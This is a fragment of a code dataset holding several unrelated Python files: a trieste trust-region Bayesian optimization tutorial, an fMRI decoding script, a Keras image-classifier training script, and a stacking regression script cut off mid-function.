Here is a snippet: ...{:s}...\\n***\".format(score, header, documents[i][snippet_index:snippet_index+100]))\n print(matches)\n return matches\n\n\n#running the program\ndocuments = []\nfile_variable = open(\"enwiki-20181001-corpus.100-articles.txt\", encoding=\"utf8\")\ntext_string = file_variable.read()\nprint(\"This is a test seach engine for wildcards\")\nquery = input(\"input query:\")\n\nquery = query.lower()\ndocuments = relevance(text_string)\n#documents = modify_wildcards_in_doc(query, documents)\n\nmatches = test_query(query) \n\n","repo_name":"kanerv/TuukkaSaanaKanerva","sub_path":"Test_files/wildcard_search_test.py","file_name":"wildcard_search_test.py","file_ext":"py","file_size_in_byte":5272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"523966914","text":"# ---\n# jupyter:\n# jupytext:\n# cell_metadata_filter: -all\n# custom_cell_magics: kql\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.11.2\n# kernelspec:\n# display_name: .venv_310\n# language: python\n# name: python3\n# ---\n\n# %% [markdown]\n# # Trust region Bayesian optimization\n#\n# We will demonstrate three trust region Bayesian optimization algorithms in this tutorial.\n\n# %%\nimport numpy as np\nimport tensorflow as tf\n\nnp.random.seed(1793)\ntf.random.set_seed(1793)\n\n# %% [markdown]\n# ## Define the problem and model\n#\n# We can use trust regions for Bayesian optimization in much the same way as we used EGO and EI in\n# the [introduction notebook](expected_improvement.ipynb). Since the setup is very similar to\n# that tutorial, we'll skip over most of the detail.\n\n# %%\nimport trieste\nfrom trieste.objectives import Branin\n\nbranin = Branin.objective\nsearch_space = Branin.search_space\n\nnum_initial_data_points = 10\ninitial_query_points = search_space.sample(num_initial_data_points)\nobserver = trieste.objectives.utils.mk_observer(branin)\ninitial_data = observer(initial_query_points)\n\n# %% [markdown]\n# As usual, we'll use Gaussian process regression to model the function. Note that we set the\n# likelihood variance to a small number because we are dealing with a noise-free problem.\n\n# %%\nfrom trieste.models.gpflow import GaussianProcessRegression, build_gpr\n\n\ndef build_model():\n gpflow_model = build_gpr(\n initial_data, search_space, likelihood_variance=1e-7\n )\n return GaussianProcessRegression(gpflow_model)\n\n\n# %% [markdown]\n# ## Trust region `TREGO` acquisition rule\n#\n# First we show how to run Bayesian optimization with the `TREGO` algorithm. This is a trust region\n# algorithm that alternates between regular EGO steps and local steps within one trust region\n# (see <cite data-cite=\"diouane2022trego\"/>).\n#\n# ### Create `TREGO` rule and run optimization loop\n#\n# We can run the Bayesian optimization loop by defining a `BayesianOptimizer` and calling its\n# `optimize` method with the trust region rule. Once the optimization loop is complete, the\n# optimizer will return one new query point for every step in the loop; that's 5 points in total.\n#\n# In order to create the `TREGO` rule, we use the `BatchTrustRegionBox` class. This class supports\n# multiple trust regions, but here we only need one region of type `TREGOBox`. The `TREGOBox` class\n# implements the `TREGO` algorithm inside a single trust region. 
Note: we cover batch trust regions in\n# more detail in the next section.\n#\n# `TREGO` is a \"meta\" rule that applies a base-rule, either inside a trust region or the whole\n# space. The default base-rule is `EfficientGlobalOptimization`, but a different base-rule can be\n# provided as an argument to `TREGO`. Here we explicitly set it to make usage clear.\n\n# %%\ntrego_acq_rule = trieste.acquisition.rule.BatchTrustRegionBox(\n trieste.acquisition.rule.TREGOBox(search_space),\n rule=trieste.acquisition.rule.EfficientGlobalOptimization(),\n)\nbo = trieste.bayesian_optimizer.BayesianOptimizer(observer, search_space)\n\nnum_steps = 5\nresult = bo.optimize(\n num_steps, initial_data, build_model(), trego_acq_rule, track_state=True\n)\ndataset = result.try_get_final_dataset()\n\n# %% [markdown]\n# ### Visualizing `TREGO` results\n#\n# Let's take a look at where we queried the observer, the original query points (crosses), new\n# query points (dots) and the optimum point found (purple dot), and where they lie with respect to\n# the contours of the Branin.\n\n# %%\nfrom trieste.experimental.plotting import plot_bo_points, plot_function_2d\n\n\ndef plot_final_result(_dataset: trieste.data.Dataset) -> None:\n arg_min_idx = tf.squeeze(tf.argmin(_dataset.observations, axis=0))\n query_points = _dataset.query_points.numpy()\n _, ax = plot_function_2d(\n branin,\n search_space.lower,\n search_space.upper,\n grid_density=40,\n contour=True,\n )\n\n plot_bo_points(query_points, ax[0, 0], num_initial_data_points, arg_min_idx)\n\n\nplot_final_result(dataset)\n\n# %% [markdown]\n# We can also visualize the progress of the optimization by plotting the acquisition space at each\n# step. This space is either the full search space or the trust region, depending on the step, and\n# is shown as a translucent box; with the current optimum point in a region shown in matching\n# color.\n#\n# Note there is only one trust region in this plot, however the rule in the next section will show\n# multiple trust regions.\n\n# %%\nimport base64\n\nimport IPython\nimport matplotlib.pyplot as plt\n\nfrom trieste.experimental.plotting import (\n convert_figure_to_frame,\n convert_frames_to_gif,\n plot_trust_region_history_2d,\n)\n\n\ndef plot_history(result: trieste.bayesian_optimizer.OptimizationResult) -> None:\n frames = []\n for step, hist in enumerate(\n result.history + [result.final_result.unwrap()]\n ):\n fig, _ = plot_trust_region_history_2d(\n branin,\n search_space.lower,\n search_space.upper,\n hist,\n num_init=num_initial_data_points,\n )\n\n if fig is not None:\n fig.suptitle(f\"step number {step}\")\n frames.append(convert_figure_to_frame(fig))\n plt.close(fig)\n\n gif_file = convert_frames_to_gif(frames)\n gif = IPython.display.HTML(\n '<img src=\"data:image/gif;base64,{0}\"/>'.format(\n base64.b64encode(gif_file.getvalue()).decode()\n )\n )\n IPython.display.display(gif)\n\n\nplot_history(result)\n\n# %% [markdown]\n# ## Batch trust region rule\n#\n# Next we demonstrate how to run Bayesian optimization with the batch trust region rule.\n#\n# ### Create the batch trust region acquisition rule\n#\n# We achieve Bayesian optimization with trust regions by specifying `BatchTrustRegionBox` as the\n# acquisition rule.\n#\n# This rule needs an initial number `num_query_points` of sub-spaces (or trust regions) to be\n# provided and performs optimization in parallel across all these sub-spaces. 
Each region\n# contributes one query point, resulting in each acquisition step collecting `num_query_points`\n# points overall. As the optimization process continues, the bounds of these sub-spaces are\n# dynamically updated. In this example, we create 5 `SingleObjectiveTrustRegionBox` regions. This\n# class encapsulates the behavior of a trust region in a single sub-space; being responsible for\n# maintaining its own state, initializing it, and updating it after each step.\n#\n# In addition, `BatchTrustRegionBox` is a \"meta\" rule that requires the specification of a\n# batch acquisition base-rule for performing optimization; for our example we use\n# `EfficientGlobalOptimization` coupled with the `ParallelContinuousThompsonSampling` acquisition\n# function.\n#\n# Note: in this example the number of sub-spaces/regions is equal to the number of batch query\n# points in the base-rule. This results in each region contributing one query point to the overall\n# batch. However, it is possible to generate multiple query points from each region by setting\n# `num_query_points` to be a multiple `Q` of the number of regions. In this case, each region will\n# contribute `Q` query points to the overall batch.\n\n# %%\nnum_query_points = 5\n\ninit_subspaces = [\n trieste.acquisition.rule.SingleObjectiveTrustRegionBox(search_space)\n for _ in range(num_query_points)\n]\nbase_rule = trieste.acquisition.rule.EfficientGlobalOptimization( # type: ignore[var-annotated]\n builder=trieste.acquisition.ParallelContinuousThompsonSampling(),\n num_query_points=num_query_points,\n)\nbatch_acq_rule = trieste.acquisition.rule.BatchTrustRegionBox(\n init_subspaces, base_rule\n)\n\n# %% [markdown]\n# ### Run the optimization loop\n#\n# We run the Bayesian optimization loop as before by defining a `BayesianOptimizer` and calling its\n# `optimize` method with the trust region rule. Once the optimization loop is complete, the\n# optimizer will return `num_query_points` new query points for every step in the loop. With\n# 5 steps, that's 25 points in total.\n\n# %%\nbo = trieste.bayesian_optimizer.BayesianOptimizer(observer, search_space)\n\nnum_steps = 5\nresult = bo.optimize(\n num_steps, initial_data, build_model(), batch_acq_rule, track_state=True\n)\ndataset = result.try_get_final_dataset()\n\n# %% [markdown]\n# ### Visualizing batch trust region results\n#\n# We visualize the results as before.\n\n# %%\nplot_final_result(dataset)\n\n# %%\nplot_history(result)\n\n# %% [markdown]\n# ## Trust region `TurBO` acquisition rule\n#\n# Finally, we show how to run Bayesian optimization with the `TurBO` algorithm. This is a\n# trust region algorithm that uses local models and datasets to approximate the objective function\n# within one trust region.\n#\n# ### Create `TurBO` rule and run optimization loop\n#\n# As before, this meta-rule requires the specification of an acquisition base-rule for performing\n# optimization within the trust region; for our example we use the `DiscreteThompsonSampling` rule.\n#\n# Note that trieste maintains a global model that is, by default, automatically trained on each\n# iteration. 
However, this global model is unused for `TurBO`; which uses a local model instead.\n# As fitting the global model would be redundant and wasteful, we switch its training off by\n# setting `fit_model=False` in the `optimize` method.\n\n# %%\nturbo_acq_rule = trieste.acquisition.rule.TURBO(\n search_space, rule=trieste.acquisition.rule.DiscreteThompsonSampling(500, 3)\n)\nbo = trieste.bayesian_optimizer.BayesianOptimizer(observer, search_space)\n\nnum_steps = 5\nresult = bo.optimize(\n num_steps,\n initial_data,\n build_model(),\n turbo_acq_rule,\n track_state=True,\n fit_model=False,\n)\ndataset = result.try_get_final_dataset()\n\n# %% [markdown]\n# ### Visualizing `TurBO` results\n#\n# We display the results as earlier.\n\n# %%\nplot_final_result(dataset)\n\n# %%\nplot_history(result)\n\n# %% [markdown]\n# ## LICENSE\n#\n# [Apache License 2.0](https://github.com/secondmind-labs/trieste/blob/develop/LICENSE)\n","repo_name":"secondmind-labs/trieste","sub_path":"docs/notebooks/trust_region.pct.py","file_name":"trust_region.pct.py","file_ext":"py","file_size_in_byte":10081,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"3"} +{"seq_id":"29083618828","text":"from matplotlib.colors import LinearSegmentedColormap\nimport numpy as np\nimport sys\nimport time\n\n\n### Load the dataset from Miyawaki #####################################################\nfrom utils import datasets\ndataset = datasets.fetch_miyawaki2008()\n\n# Keep only random runs\nX_random = dataset.func[12:]\ny_random = dataset.label[12:]\ny_shape = (10, 10)\n\n### Preprocess data ###########################################################\nfrom utils import masking, signal\nimport nibabel\n\nsys.stderr.write(\"Preprocessing data...\")\nt0 = time.time()\n\nbluegreen = LinearSegmentedColormap('bluegreen', {\n 'red': ((0., 0., 0.),\n (1., 0., 0.)),\n 'green': ((0., 0., 0.),\n (1., 1., 1.)),\n 'blue': ((0., 0.2, 0.2),\n (0.5, 0.5, 0.5),\n (1., 0., 0.))\n })\n\n\n# Load and mask fMRI data\n\nX_train = []\nfor x_random in X_random:\n # Mask data\n x_img = nibabel.load(x_random)\n x = masking.apply_mask(x_img, dataset.mask)\n x = signal.clean(x, standardize=True, detrend=True)\n X_train.append(x)\n\n# Load target data\ny_train = []\nfor y in y_random:\n y_train.append(np.reshape(np.loadtxt(y, dtype=np.int, delimiter=','),\n (-1,) + y_shape, order='F'))\n\nX_train = [x[2:] for x in X_train]\ny_train = [y[:-2] for y in y_train]\n\nX_train = np.vstack(X_train)\ny_train = np.vstack(y_train).astype(np.float)\n\n# Remove rest period\nX_train = X_train[y_train[:, 0, 0] != -1]\ny_train = y_train[y_train[:, 0, 0] != -1]\n\ny_train = np.reshape(y_train, (-1, y_shape[0] * y_shape[1]))\n\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\n### Prediction function #######################################################\nimport pylab as pl\nimport os\n\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import LogisticRegression as LR\nfrom sklearn.feature_selection import f_classif, SelectKBest\n\nsys.stderr.write(\"Single pixel prediction\\n\")\n\n# Pixel chose for the study\np = (4, 2)\n\n# Get index of the chosen pixel in flattened array\ni_p = 42\n\n# Logistic Regression\nsys.stderr.write(\"\\tLogistic regression...\")\nt0 = time.time()\ncache_path = os.path.join('miyawaki', 'lr_coef.npy')\nif not os.path.exists(cache_path):\n lr = LR(penalty='l1', C=0.05)\n lr.fit(X_train, y_train[:, i_p])\n np.save(cache_path, lr.coef_)\nlr_coef = np.load(cache_path)\nsys.stderr.write(\" Done 
(%.2fs)\\n\" % (time.time() - t0))\n\n# Support Vector Classifier\nsys.stderr.write(\"\\tSupport vector classifier...\")\nt0 = time.time()\ncache_path = os.path.join('miyawaki', 'svc_coef.npy')\nif not os.path.exists(cache_path):\n svc = LinearSVC(penalty='l1', dual=False, C=0.01)\n svc.fit(X_train, y_train[:, i_p])\n np.save(cache_path, svc.coef_)\nsvc_coef = np.load(cache_path)\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\n### Output ###################################################################\nfrom matplotlib.lines import Line2D\n\n# Create masks for contour\n### Mask of chosen voxels\ncontour = np.zeros(nibabel.load(dataset.mask).shape, dtype=bool)\nfor x, y in [(31, 9), (31, 10), (30, 10), (32, 10)]:\n contour[x, y, 10] = 1\n### Mask of chosen pixel\npixmask = np.zeros((10, 10), dtype=bool)\npixmask[p] = 1\n\n\ndef plot_lines(mask, linewidth=3, color='b'):\n for i, j in np.ndindex(mask.shape):\n if i + 1 < mask.shape[0] and mask[i, j] != mask[i + 1, j]:\n pl.gca().add_line(Line2D([j - .5, j + .5], [i + .5, i + .5],\n color=color, linewidth=linewidth))\n if j + 1 < mask.shape[1] and mask[i, j] != mask[i, j + 1]:\n pl.gca().add_line(Line2D([j + .5, j + .5], [i - .5, i + .5],\n color=color, linewidth=linewidth))\n\n\nfig = pl.figure(figsize=(8, 8))\nax1 = pl.axes([0., 0., 1., 1.])\nsbrain = masking.unmask(lr_coef[0], dataset.mask)\nbg = nibabel.load(os.path.join('utils', 'bg.nii.gz'))\npl.imshow(bg.get_data()[:, :, 10].T, interpolation=\"nearest\", cmap='gray',\n origin='lower')\npl.imshow(np.ma.masked_equal(sbrain[:, :, 10].T, 0.), interpolation=\"nearest\",\n cmap=bluegreen, origin='lower', vmin=0., vmax=2.6)\nplot_lines(contour[:, :, 10].T, color='r')\npl.axis('off')\nax2 = pl.axes([.1, .5, .05, .45])\ncb = pl.colorbar(cax=ax2, ax=ax1)\ncb.ax.yaxis.set_ticks_position('left')\ncb.ax.yaxis.set_tick_params(labelcolor='white')\ncb.ax.yaxis.set_tick_params(labelsize=32)\ncb.set_ticks([0., 1.3, 2.6])\npl.savefig(os.path.join('miyawaki', 'pixel_logistic.pdf'))\npl.savefig(os.path.join('miyawaki', 'pixel_logistic.png'))\npl.savefig(os.path.join('miyawaki', 'pixel_logistic.eps'))\nsys.stderr.write(\"Logistic regression: %d nonzero voxels\\n\" %\n np.sum(lr_coef != 0.))\npl.close()\n\nfig = pl.figure(figsize=(8, 8))\nax1 = pl.axes([0., 0., 1., 1.])\nsbrain = masking.unmask(svc_coef[0], dataset.mask)\nvmax = np.max(np.abs(sbrain[:, :, 10].T))\npl.imshow(bg.get_data()[:, :, 10].T, interpolation=\"nearest\", cmap='gray',\n origin='lower')\npl.imshow(np.ma.masked_equal(sbrain[:, :, 10].T, 0.), interpolation=\"nearest\",\n cmap=bluegreen, origin='lower', vmin=0., vmax=1.0)\nplot_lines(contour[:, :, 10].T, color='r')\npl.axis('off')\nax2 = pl.axes([.1, .5, .05, .45])\ncb = pl.colorbar(cax=ax2, ax=ax1)\ncb.ax.yaxis.set_ticks_position('left')\ncb.ax.yaxis.set_tick_params(labelcolor='white')\ncb.ax.yaxis.set_tick_params(labelsize=28)\ncb.set_ticks([0., .5, 1.])\npl.savefig(os.path.join('miyawaki', 'pixel_svc.pdf'))\npl.savefig(os.path.join('miyawaki', 'pixel_svc.png'))\npl.savefig(os.path.join('miyawaki', 'pixel_svc.eps'))\nsys.stderr.write(\"SVC: %d nonzero voxels\\n\" % np.sum(lr_coef != 0.))\npl.close()\n\n\n### Calcualte the Cross Validation Scores ###################################################\nfrom sklearn.cross_validation import cross_val_score\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.externals.joblib import Parallel, delayed\n\npipeline_LR = Pipeline([('selection', SelectKBest(f_classif, 500)),\n ('clf', LR(penalty=\"l1\", C=0.05))])\npipeline_SVC = 
Pipeline([('selection', SelectKBest(f_classif, 500)),\n ('clf', LinearSVC(penalty='l1', dual=False, C=0.01))])\npipeline_SVCL2 = Pipeline([('selection', SelectKBest(f_classif, 500)),\n ('clf', LinearSVC(penalty='l2', dual=False, C=0.001))])\n\nsys.stderr.write(\"Cross validation\\n\")\n\nsys.stderr.write(\"\\tLogistic regression...\")\nt0 = time.time()\ncache_path = os.path.join('miyawaki', 'lr_scores.npy')\nif not os.path.exists(cache_path):\n scores_log = Parallel(n_jobs=1)(delayed(cross_val_score)(\n pipeline_LR, X_train, y, cv=5, verbose=True) for y in y_train.T)\n np.save(cache_path, scores_log)\nlr_scores = np.load(cache_path)\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\nsys.stderr.write(\"\\tSupport vector classifier...\")\nt0 = time.time()\ncache_path = os.path.join('miyawaki', 'svc_scores.npy')\nif not os.path.exists(cache_path):\n scores_svc = Parallel(n_jobs=1)(delayed(cross_val_score)(\n pipeline_SVC, X_train, y, cv=5, verbose=True) for y in y_train.T)\n np.save(cache_path, scores_svc)\nsvc_scores = np.load(cache_path)\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\nsys.stderr.write(\"\\tSupport vector classifier L2...\")\nt0 = time.time()\ncache_path = os.path.join('miyawaki', 'svcl2_scores.npy')\nif not os.path.exists(cache_path):\n scores_svcl2 = Parallel(n_jobs=1)(delayed(cross_val_score)(\n pipeline_SVCL2, X_train, y, cv=5, verbose=True) for y in y_train.T)\n np.save(cache_path, scores_svcl2)\nsvcl2_scores = np.load(cache_path)\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\n### Output ####################################################################\n\nfig = pl.figure(figsize=(8, 8))\npl.imshow(np.array(lr_scores).mean(1).reshape(10, 10),\n interpolation=\"nearest\", vmin=.3, vmax=1.)\nplot_lines(pixmask, linewidth=6)\npl.axis('off')\npl.hot()\nfig.subplots_adjust(bottom=0., top=1., left=0., right=1.)\npl.savefig(os.path.join('miyawaki', 'scores_log.pdf'))\npl.savefig(os.path.join('miyawaki', 'scores_log.eps'))\nprint('Logistic Regression mean accuracy: %f' % lr_scores.mean())\npl.close()\n\n\nfig = pl.figure(figsize=(8, 8))\npl.imshow(np.array(svc_scores).mean(1).reshape(10, 10),\n interpolation=\"nearest\", vmin=.3, vmax=1.)\nplot_lines(pixmask, linewidth=6)\npl.axis('off')\npl.hot()\nfig.subplots_adjust(bottom=0., top=1., left=0., right=1.)\npl.savefig(os.path.join('miyawaki', 'scores_svc.pdf'))\npl.savefig(os.path.join('miyawaki', 'scores_svc.eps'))\nprint('SVC L1 mean accuracy: %f' % svc_scores.mean())\npl.close()\n\n\nfig = pl.figure(figsize=(8, 8))\npl.imshow(np.array(svcl2_scores).mean(1).reshape(10, 10),\n interpolation=\"nearest\", vmin=.3, vmax=1.)\nplot_lines(pixmask, linewidth=6)\npl.axis('off')\npl.hot()\nfig.subplots_adjust(bottom=0., top=1., left=0., right=1.)\npl.savefig(os.path.join('miyawaki', 'scores_svcl2.pdf'))\npl.savefig(os.path.join('miyawaki', 'scores_svcl2.eps'))\nprint('SVC L2 mean accuracy: %f' % svcl2_scores.mean())\npl.close()\n\n### Plot the colorbar #########################################################\nimport matplotlib as mpl\n\n\nfig = pl.figure(figsize=(.6, 3.6))\ncmap = mpl.cm.hot\nnorm = mpl.colors.Normalize(vmin=.3, vmax=1.)\ncb = mpl.colorbar.ColorbarBase(pl.gca(), cmap=cmap, norm=norm)\n# cb.ax.yaxis.set_ticks_position('left')\ncb.set_ticks(np.arange(0.3, 1.1, 0.1))\nfig.subplots_adjust(bottom=0.03, top=.97, left=0., right=.5)\npl.savefig(os.path.join('miyawaki', 'scores_colorbar.png'))\npl.savefig(os.path.join('miyawaki', 
'scores_colorbar.pdf'))\npl.savefig(os.path.join('miyawaki', 'scores_colorbar.eps'))\n","repo_name":"AlexandreAbraham/frontiers2013","sub_path":"scripts/miyawaki_decoding.py","file_name":"miyawaki_decoding.py","file_ext":"py","file_size_in_byte":9498,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"3"} +{"seq_id":"852838332","text":"import json\nimport shutil\nimport os\nimport pickle\nfrom callback import MultipleClassAUROC, MultiGPUModelCheckpoint\nfrom configparser import ConfigParser\nfrom generator import AugmentedImageSequence\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau\nfrom keras.optimizers import Adam\nfrom keras.utils import multi_gpu_model\nfrom models.keras import ModelFactory\nfrom utility import get_sample_counts\nfrom weights import get_class_weights\nfrom augmenter import augmenter\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nset_session(sess)\n\n\ndef main():\n config_file = \"config.ini\"\n cp = ConfigParser()\n cp.read(config_file)\n\n output_dir = cp[\"DEFAULT\"].get(\"output_dir\")\n image_source_dir = cp[\"DEFAULT\"].get(\"image_source_dir\")\n base_model_name = cp[\"DEFAULT\"].get(\"base_model_name\")\n class_names = cp[\"DEFAULT\"].get(\"class_names\").split(\",\")\n\n use_base_model_weights = cp[\"TRAIN\"].getboolean(\"use_base_model_weights\")\n use_trained_model_weights = cp[\"TRAIN\"].getboolean(\"use_trained_model_weights\")\n use_best_weights = cp[\"TRAIN\"].getboolean(\"use_best_weights\")\n output_weights_name = cp[\"TRAIN\"].get(\"output_weights_name\")\n epochs = cp[\"TRAIN\"].getint(\"epochs\")\n batch_size = cp[\"TRAIN\"].getint(\"batch_size\")\n initial_learning_rate = cp[\"TRAIN\"].getfloat(\"initial_learning_rate\")\n generator_workers = cp[\"TRAIN\"].getint(\"generator_workers\")\n image_dimension = cp[\"TRAIN\"].getint(\"image_dimension\")\n train_steps = cp[\"TRAIN\"].get(\"train_steps\")\n patience_reduce_lr = cp[\"TRAIN\"].getint(\"patience_reduce_lr\")\n min_lr = cp[\"TRAIN\"].getfloat(\"min_lr\")\n validation_steps = cp[\"TRAIN\"].get(\"validation_steps\")\n positive_weights_multiply = cp[\"TRAIN\"].getfloat(\"positive_weights_multiply\")\n dataset_csv_dir = cp[\"TRAIN\"].get(\"dataset_csv_dir\")\n \n if use_trained_model_weights:\n training_stats_file = os.path.join(output_dir, \".training_stats.json\")\n if os.path.isfile(training_stats_file):\n training_stats = json.load(open(training_stats_file))\n else:\n training_stats = {}\n else:\n training_stats = {}\n\n show_model_summary = cp[\"TRAIN\"].getboolean(\"show_model_summary\")\n\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n\n running_flag_file = os.path.join(output_dir, \".training.lock\")\n if os.path.isfile(running_flag_file):\n raise RuntimeError(\"A process is running in this directory!!!\")\n else:\n open(running_flag_file, \"a\").close()\n try:\n shutil.copy(config_file, os.path.join(output_dir, os.path.split(config_file)[1]))\n\n datasets = [\"train\", \"valid\"]\n for dataset in datasets:\n shutil.copy(os.path.join(dataset_csv_dir, dataset + '.csv'), output_dir)\n\n train_counts, train_pos_counts = get_sample_counts(output_dir, \"train\", class_names)\n dev_counts, _ = get_sample_counts(output_dir, \"valid\", class_names)\n\n if train_steps == \"auto\":\n train_steps = int(train_counts / batch_size)\n else:\n try:\n train_steps = int(train_steps)\n 
except ValueError:\n raise ValueError(\"\"\"\n train_steps: {train_steps} is invalid,\n use 'auto' or integer.\n \"\"\")\n\n if validation_steps == \"auto\":\n validation_steps = int(dev_counts / batch_size)\n else:\n try:\n validation_steps = int(validation_steps)\n except ValueError:\n raise ValueError(\"\"\"\n validation_steps: {validation_steps} is invalid,\n use 'auto' or integer.\n \"\"\")\n class_weights = get_class_weights(\n train_counts,\n train_pos_counts,\n multiply=positive_weights_multiply,\n )\n\n if use_trained_model_weights:\n if use_best_weights:\n model_weights_file = os.path.join(output_dir, \"best_\" + output_weights_name)\n else:\n model_weights_file = os.path.join(output_dir, output_weights_name)\n else:\n model_weights_file = None\n\n model_factory = ModelFactory()\n model = model_factory.get_model(\n class_names,\n model_name=base_model_name,\n use_base_weights=use_base_model_weights,\n weights_path=model_weights_file,\n input_shape=(image_dimension, image_dimension, 3))\n\n if show_model_summary:\n print(model.summary())\n\n train_sequence = AugmentedImageSequence(\n dataset_csv_file=os.path.join(output_dir, \"train.csv\"),\n class_names=class_names,\n source_image_dir=image_source_dir,\n batch_size=batch_size,\n target_size=(image_dimension, image_dimension),\n augmenter=augmenter,\n steps=train_steps,\n )\n validation_sequence = AugmentedImageSequence(\n dataset_csv_file=os.path.join(output_dir, \"valid.csv\"),\n class_names=class_names,\n source_image_dir=image_source_dir,\n batch_size=batch_size,\n target_size=(image_dimension, image_dimension),\n augmenter=augmenter,\n steps=validation_steps,\n shuffle_on_epoch_end=False,\n )\n\n output_weights_path = os.path.join(output_dir, output_weights_name)\n gpus = len(os.getenv(\"CUDA_VISIBLE_DEVICES\", \"1\").split(\",\"))\n if gpus > 1:\n model_train = multi_gpu_model(model, gpus)\n checkpoint = MultiGPUModelCheckpoint(\n filepath=output_weights_path,\n base_model=model,\n )\n else:\n model_train = model\n checkpoint = ModelCheckpoint(\n output_weights_path,\n save_weights_only=True,\n save_best_only=True,\n verbose=1,\n )\n\n optimizer = Adam(lr=initial_learning_rate)\n model_train.compile(optimizer=optimizer, loss=\"binary_crossentropy\")\n auroc = MultipleClassAUROC(\n sequence=validation_sequence,\n class_names=class_names,\n weights_path=output_weights_path,\n stats=training_stats,\n workers=generator_workers,\n )\n callbacks = [\n checkpoint,\n TensorBoard(log_dir=os.path.join(output_dir, \"logs\"), batch_size=batch_size),\n ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=patience_reduce_lr,\n verbose=1, mode=\"min\", min_lr=min_lr),\n auroc,\n ]\n\n history = model_train.fit_generator(\n generator=train_sequence,\n steps_per_epoch=train_steps,\n epochs=epochs,\n validation_data=validation_sequence,\n validation_steps=validation_steps,\n callbacks=callbacks,\n class_weight=class_weights,\n workers=generator_workers,\n shuffle=False,\n )\n\n with open(os.path.join(output_dir, \"history.pkl\"), \"wb\") as f:\n pickle.dump({\n \"history\": history.history,\n \"auroc\": auroc.aurocs,\n }, f)\n\n finally:\n os.remove(running_flag_file)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"anondo1969/SHAMSUL","sub_path":"codes/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"10665847877","text":"# -*- coding:utf-8 -*-\r\n# &Author AnFany\r\n\r\n# 两层的Stacking回归\r\nfrom 
wxpy import *\r\nbot = Bot(cache_path=True)\r\n\r\n# 第一层6个模型:随机森林,AdaBoost,GBDT,LightGBM,XGBoost,CatBoost\r\n# 第二层模型:BP神经网络回归\r\n\r\n# 引入数据文件\r\nimport pm25_Stacking_Data as pm25\r\n\r\n# 引入绘图库包\r\nimport matplotlib.pyplot as plt\r\nfrom pylab import mpl\r\nmpl.rcParams['font.sans-serif'] = ['FangSong'] # 显示中文\r\nmpl.rcParams['axes.unicode_minus'] = False # 显示负号\r\n\r\n# 引入需要用到的模型的库包\r\n# 随机森林\r\nfrom sklearn.ensemble import RandomForestRegressor as RF\r\n# AdaBoost\r\nfrom sklearn.ensemble import AdaBoostRegressor\r\nfrom sklearn.tree import DecisionTreeRegressor\r\n# GBDT\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\n# XGBoost\r\nimport xgboost as xgb\r\n# LightGBM\r\nimport lightgbm as lgbm\r\n# CatBoost\r\nimport catboost as cb\r\n# BP神经网络回归\r\nimport BP_Regression as bp\r\n\r\n# 其他库包\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom collections import OrderedDict # python字典是无序的,此包是有序的\r\nimport os\r\nos.chdir(r'E:\\tensorflow_Learn\\Stacking\\pm25')\r\n'''\r\n第一部分:数据处理模型\r\n'''\r\n\r\nclass DATA:\r\n\r\n def __init__(self, datadict=pm25.data_dict, mubiao='pm2.5'):\r\n self.data = datadict\r\n self.k = 8 # 因为需要对每个模型进行单独的数据处理,因此这个折数对于每个模型都必须是一样的\r\n\r\n # 训练数据\r\n self.chidata = self.data['train']\r\n\r\n # 预测数据\r\n self.nodata = self.data['predict']\r\n\r\n # 类别型数据的编号\r\n self.catsign = self.Sign()\r\n\r\n # 目标字段\r\n self.ziduan = mubiao\r\n\r\n # 对于归一化化和标准化的处理,要记录转化的值,在这里将2者统一。反处理时,预测值需要乘以self.fenmu 加上self.cha\r\n self.fenmu = 1 # 相当于标准化的标准差, 归一化的最大值减去最小值\r\n self.cha = 0 # 相当于标准化的平均值, 归一化的最小值\r\n\r\n # 因为对于CatBoost而言,不需要进行类别型特征的处理,但是需要类别型特征的标号\r\n def Sign(self):\r\n sign = []\r\n numlist = self.chidata.values[0][: -1] # 不包括最后的目标字段\r\n for jj in range(len(numlist)):\r\n try:\r\n numlist[jj] + 9\r\n except TypeError:\r\n sign.append(jj)\r\n return sign\r\n\r\n # 类别型特征数字标签化函数,\r\n def CAtoDI(self):\r\n # 如果特征值不能执行数字加法运算,则视为类别型特征\r\n for tezheng in self.chidata:\r\n try:\r\n self.chidata[tezheng].values[0] + 1\r\n except TypeError:\r\n numlist = sorted(list(set(list(self.chidata[tezheng]))))\r\n self.chidata[tezheng] = [numlist.index(hh) for hh in self.chidata[tezheng]]\r\n try:\r\n self.nodata[tezheng] = [numlist.index(ss) for ss in self.nodata[tezheng]]\r\n except ValueError:\r\n print('特征%s:预测比训练的多了值' % (tezheng))\r\n return print('数字化处理完毕')\r\n\r\n # 对于归一化和标准化的函数,要记录目标字段的转化值,因为要进行反归一化\r\n\r\n # 归一化函数\r\n def Normal(self):\r\n # 在此之前需要把类别型标签去掉,否则会报错\r\n for tezheng in self.chidata:\r\n maxnum = max(list(self.chidata[tezheng]))\r\n minum = min(list(self.chidata[tezheng]))\r\n if maxnum == minum:\r\n self.chidata[tezheng] = [1 for hh in self.chidata[tezheng]]\r\n self.nodata[tezheng] = [1 for ss in 